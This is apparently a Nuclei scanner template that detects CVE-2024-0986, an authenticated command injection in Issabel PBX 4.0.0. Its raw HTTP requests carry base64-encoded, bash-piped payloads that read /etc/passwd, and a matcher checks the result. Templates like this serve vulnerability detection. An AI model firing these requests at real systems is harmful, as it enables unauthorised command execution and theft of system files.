id: CVE-2024-0986

info:
  name: Issabel Authenticated - Remote Code Execution
  author: eunji
  severity: medium
  description: |
    A vulnerability was found in Issabel PBX 4.0.0. It has been rated as critical. This issue affects some unknown processing of the file /index.php?menu=asterisk_cli of the component Asterisk-Cli. The manipulation of the argument Command leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252251. NOTE- The vendor was contacted early about this disclosure but did not respond in any way.
  impact: |
    Authenticated administrators can inject and execute arbitrary OS commands remotely via the Asterisk CLI, potentially gaining full control over the Issabel PBX system.
  remediation: |
    Update Issabel PBX to a version newer than 4.0.0 that addresses this command injection vulnerability.
  reference:
    - https://github.com/issabel-org/issabel/issues
    - https://vuldb.com/?ctiid.252251
    - https://vuldb.com/?id.252251
    - https://www.vicarius.io/vsociety/posts/issabel-authenticated-remote-code-execution-cve-2024-0986
    - https://nvd.nist.gov/vuln/detail/CVE-2024-0986
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 4.7
    cve-id: CVE-2024-0986
    cwe-id: CWE-78
    epss-score: 0.80633
    epss-percentile: 0.9916
    cpe: cpe:2.3:a:issabel:pbx:4.0.0:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: issabel
    product: pbx
    fofa-query: title="issabel"
  tags: cve,cve2024,isssabel,authenticated,rce,asterisk,vuln

variables:
  username: "{{username}}"
  password: "{{password}}"

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        input_user={{username}}&input_pass={{password}}&submit_login=

      - |
        POST /index.php?menu=asterisk_cli HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        txtCommand=xmldoc+dump+%2Fvar%2Fwww%2Fbackup%2Fx%7C%7Becho%2CY2F0IC4uLy4uLy4uLy4uLy4uLy4uL2V0Yy9wYXNzd2Q%3D%7D%7C%7Bbase64%2C-d%7D%7Cbash

      - |
        GET /modules/backup_restore/restore.php?filename=x%7C%7Becho,Y2F0IC4uLy4uLy4uLy4uLy4uLy4uL2V0Yy9wYXNzd2Q=%7D%7C%7Bbase64,-d%7D%7Cbash HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body_3
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a0046304402206124abce413ca5c90de6e44311f5b678e137dc35e17f24480467c48ce9d6555e0220155f892a8903b3bcbb107a53069a8403f4304656024316f8e0dd466c134e8c64:922c64590222798bb761d5b6d8e72950